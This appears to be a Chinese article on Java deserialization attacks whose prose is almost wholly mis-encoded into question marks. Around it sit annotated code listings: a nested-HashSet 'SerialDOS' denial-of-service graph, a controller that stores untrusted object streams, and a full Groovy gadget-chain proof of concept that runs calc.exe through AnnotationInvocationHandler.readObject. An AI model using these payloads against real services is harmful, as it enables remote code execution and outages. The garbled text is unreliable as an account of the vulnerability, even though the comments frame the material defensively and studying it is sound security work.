????2. ?????????????????????????????л??????·????л?????????? ?????????????磺
// Builds the nested-HashSet graph commonly called "SerialDOS": root holds the
// level-0 pair (t1, t2), each of which holds the level-1 pair, and so on for 10
// levels. Both parents at a level share the same two children, so the
// serialized form stays small even though the graph is deep.
// NOTE(review): on deserialization HashSet.readObject re-inserts every element,
// and AbstractSet.hashCode recurses through the nested sets, so the hashing
// work grows roughly by a factor of two per level — confirm against the
// (garbled) surrounding text.
// Defensive mitigation: do not deserialize untrusted bytes; where that is
// unavoidable, bound object-graph depth with an ObjectInputFilter (JEP 290,
// e.g. the "maxdepth=" pattern key) before readObject() is ever reached.
Set root = new HashSet();
Set s1 = root;           // cursor walking down the t1 chain
Set s2 = new HashSet();  // cursor walking down the t2 chain; this initial set is not reachable from root
for (int i = 0; i < 10; i++) {
    Set t1 = new HashSet();
    Set t2 = new HashSet();
    t1.add("foo"); // original comment is garbled; presumably "make t1 differ from t2" so a parent set keeps both
    s1.add(t1);
    s1.add(t2);
    s2.add(t1);
    s2.add(t2);
    s1 = t1; // descend: the next level's pair is attached under this level's pair
    s2 = t2;
}
????3. ???????????л???????????????洢???????????????????????κ?У??????????????????????????
/**
 * Illustrative handler from the article: it persists whatever object stream it
 * is handed without inspecting it. Whatever later reads "xxx.ser" therefore
 * deserializes data the sender fully controls, so storing the stream is not a
 * substitute for validating (or refusing) it.
 * NOTE(review): this listing does not compile as printed — FileOutputStream has
 * no write(ObjectInputStream) overload, and the constructor's checked
 * FileNotFoundException is neither caught nor declared; it is pseudo-code for
 * the "store it unchecked" pattern.
 */
class Controller {
    public void receiveState(ObjectInputStream ois) {
        FileOutputStream fos = new FileOutputStream(new File("xxx.ser"));
        fos.write(ois); // original comment is garbled; presumably "copy the received stream unchanged"
        fos.close();    // skipped if write() throws — try-with-resources would close on every path
    }
}
???????????? FoxGlove ????????? Serialization Attack ??????????????????? Groovy ??????????
/**
 * Proof of concept reproduced by the article (attributed to the FoxGlove
 * Security write-up) for the Groovy deserialization gadget chain. Nothing in
 * this class invokes the closure itself: the call happens inside the JDK's own
 * readObject(), which is the reason deserializing untrusted bytes has to be
 * treated as executing them.
 * NOTE(review): the "??" sequences are mis-encoded separators from the source
 * page and are left as printed.
 * Defensive takeaway: remove Java-native deserialization of untrusted input;
 * where it cannot be removed, install an ObjectInputFilter (JEP 290) allow-list
 * so Proxy and handler classes like the ones below are rejected before any
 * readObject() runs.
 */
public class GroovyTest {
    public static void main(String[] args) throws Exception {
        // Groovy closure that invokes the method named "execute" on the String "calc.exe";
        // ConvertedClosure exposes it under the interface method name "entrySet".
        final ConvertedClosure closure = new ConvertedClosure(new MethodClosure("calc.exe"?? "execute")?? "entrySet");
        Class<?>[] clsArr = {Map.class};
        // Dynamic proxy implementing Map; every call on it is routed to the closure.
        final Map map = Map.class.cast(Proxy.newProxyInstance(GroovyTest.class.getClassLoader()?? clsArr?? closure));
        // sun.reflect.annotation.AnnotationInvocationHandler is not public; it is reached reflectively.
        final Constructor<?> ctor = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler").getDeclaredConstructors()[0];
        ctor.setAccessible(true);
        // Handler whose memberValues field is the proxy; its readObject() calls memberValues.entrySet().
        final InvocationHandler handler = (InvocationHandler)ctor.newInstance(Override.class?? map);
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(bos);
        oos.writeObject(handler);
        byte[] bytes = bos.toByteArray(); // the serialized payload (original comment garbled)
        ByteArrayInputStream bis = new ByteArrayInputStream(bytes);
        ObjectInputStream ois = new ObjectInputStream(bis);
        ois.readObject(); // deserialization alone reaches entrySet() and thus the closure (original comment garbled)
    }
}
??????????????У?ConvertedClosure ?????? Closure ???????? Java ?? entrySet ??????????AnnotationInvocationHandler ?? readObject ?????У???????? entrySet() ??????????? calc.exe ????á?
/**
 * JDK-internal {@code sun.reflect.annotation.AnnotationInvocationHandler.readObject}
 * as printed by the article (decompiled, hence var1..var9; the "??" in the
 * throws clause is a mis-encoded separator). {@code this.type} and
 * {@code this.memberValues} are both filled from the stream by
 * defaultReadObject(), so their concrete classes are chosen by whoever produced
 * the bytes.
 * NOTE(review): this is a method of a class whose header is not shown here;
 * later JDK releases reworked this method — confirm which version the article
 * targets.
 */
private void readObject(ObjectInputStream var1) throws IOException?? ClassNotFoundException {
    var1.defaultReadObject();
    AnnotationType var2 = null;
    try {
        // Requires this.type to be an annotation type (the PoC above passes Override.class).
        var2 = AnnotationType.getInstance(this.type);
    } catch (IllegalArgumentException var9) {
        // The original cause (var9) is dropped rather than chained.
        throw new InvalidObjectException("Non-annotation type in annotation serial stream");
    }
    Map var3 = var2.memberTypes();
    // Trigger point: entrySet() dispatches on the stream-supplied Map. When
    // memberValues is a dynamic Proxy, its InvocationHandler runs here, before
    // any of the validation below has examined a single entry.
    Iterator var4 = this.memberValues.entrySet().iterator();
    while(var4.hasNext()) {
        Entry var5 = (Entry)var4.next();
        String var6 = (String)var5.getKey();
        Class var7 = (Class)var3.get(var6);
        if(var7 != null) {
            Object var8 = var5.getValue();
            // A type mismatch is recorded as an exception proxy, not rejected.
            if(!var7.isInstance(var8) && !(var8 instanceof ExceptionProxy)) {
                var5.setValue((new AnnotationTypeMismatchExceptionProxy(var8.getClass() + "[" + var8 + "]")).setMember((Method)var2.members().get(var6)));
            }
        }
    }
}
??????????????FoxGlove Security ???????????÷????л??κβ????ε?????????????????????????????Σ????????????????????????????????????????????????????貢???????????л??????????????????????????????e?????????????????????????????????????????л???????o?????????????????????費???????е????????????
?????????????????????????????Щ????????????????????????RASP??Runtime Application Security Protection??????л????????????????????з?????